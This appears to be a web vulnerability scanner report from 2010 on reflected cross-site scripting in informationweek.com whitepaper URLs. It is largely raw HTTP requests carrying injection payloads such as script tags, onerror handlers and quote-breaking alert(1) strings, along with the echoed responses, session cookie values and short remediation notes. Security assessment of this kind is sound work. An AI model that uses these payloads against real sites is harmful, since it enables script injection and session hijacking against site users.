<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... 'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches/43ccc'-alert(1)-'7429a857bd4;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=910705214;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f358</script><a>c4d21d8c569 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security3f358</script><a>c4d21d8c569/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:57 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:57 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30535
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security3f358</script><a>c4d21d8c569/Attacks-Breaches/the-;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=45219523;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3853"><script>alert(1)</script>b69cdab5fb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whitepaper/Securityb3853"><script>alert(1)</script>b69cdab5fb0/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:53 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:53 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30603
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Securityb3853"><script>alert(1)</script>b69cdab5fb0/Attack;kvarticleid=;kvauthor=;loc=300;grp=551711504" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e83b1'-alert(1)-'f2966d07a86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breachese83b1'-alert(1)-'f2966d07a86/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:17 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:17 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30525
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... +'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breachese83b1'-alert(1)-'f2966d07a86/the-;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=965754253;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7429"><a%20b%3dc>eb3a5f3be23 was submitted in the REST URL parameter 3. This input was echoed as c7429"><a b=c>eb3a5f3be23 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Attacks-Breachesc7429"><a%20b%3dc>eb3a5f3be23/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:13 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:13 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30539
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breachesc7429"><a b=c>eb3a5f3be23/the-com;kvarticleid=;kvauthor=;loc=300;grp=321639324" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b2b9"><img%20src%3da%20onerror%3dalert(1)>ba735ca501f was submitted in the REST URL parameter 2. This input was echoed as 7b2b9"><img src=a onerror=alert(1)>ba735ca501f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /whitepaper/Security7b2b9"><img%20src%3da%20onerror%3dalert(1)>ba735ca501f/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:11 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:11 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30631
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security7b2b9"><img src=a onerror=alert(1)>ba735ca501f/Att;kvarticleid=;kvauthor=;loc=300;grp=663964713" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83686</script>a41fb08e1de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security83686</script>a41fb08e1de/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:15 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:15 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30533
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security83686</script>a41fb08e1de/Attacks-Breaches/what-is;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=587362074;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d82a'-alert(1)-'4630ad5d364 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breaches4d82a'-alert(1)-'4630ad5d364/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30525
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... +'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches4d82a'-alert(1)-'4630ad5d364/what;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=420611034;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b692"><a>c712eeac21e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Attacks-Breaches4b692"><a>c712eeac21e/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:17 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:17 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30527
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches4b692"><a>c712eeac21e/what-is-sec;kvarticleid=;kvauthor=;loc=300;grp=973072847" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d67b</script><a%20b%3dc>ece4ff79bab was submitted in the REST URL parameter 4. This input was echoed as 2d67b</script><a b=c>ece4ff79bab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breaches/2d67b</script><a%20b%3dc>ece4ff79bab HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30425
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... 'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches/2d67b</script><a b=c>ece4ff79bab;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=413231846;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d8fa"><a%20b%3dc>70051c02fe8 was submitted in the REST URL parameter 4. This input was echoed as 6d8fa"><a b=c>70051c02fe8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Attacks-Breaches/6d8fa"><a%20b%3dc>70051c02fe8 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30327
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches/6d8fa"><a b=c>70051c02fe8;kvarticleid=;kvauthor=;loc=300;grp=175634076" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18fb6'-alert(1)-'219dcd9e8f3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Encryption/18fb6'-alert(1)-'219dcd9e8f3 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:14 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:14 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30265
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Encryption/18fb6'-alert(1)-'219dcd9e8f3;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=109257931;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f948"><a>a53d5ed524c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Encryption/1f948"><a>a53d5ed524c HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:07 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:07 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30183
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Encryption/1f948"><a>a53d5ed524c;kvarticleid=;kvauthor=;loc=300;grp=141614446" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4eb5'-alert(1)-'06f538ccbaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepapera4eb5'-alert(1)-'06f538ccbaa/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:01 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:01 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30346
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/whitepapera4eb5'-alert(1)-'06f538ccbaa/Security/Privacy/ac;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=902994912;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b4d5"%20style%3dx%3aexpression(alert(1))%2003ffb9b3c2 was submitted in the REST URL parameter 2. This input was echoed as 4b4d5" style=x:expression(alert(1)) 03ffb9b3c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /whitepaper/Security4b4d5"%20style%3dx%3aexpression(alert(1))%2003ffb9b3c2/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
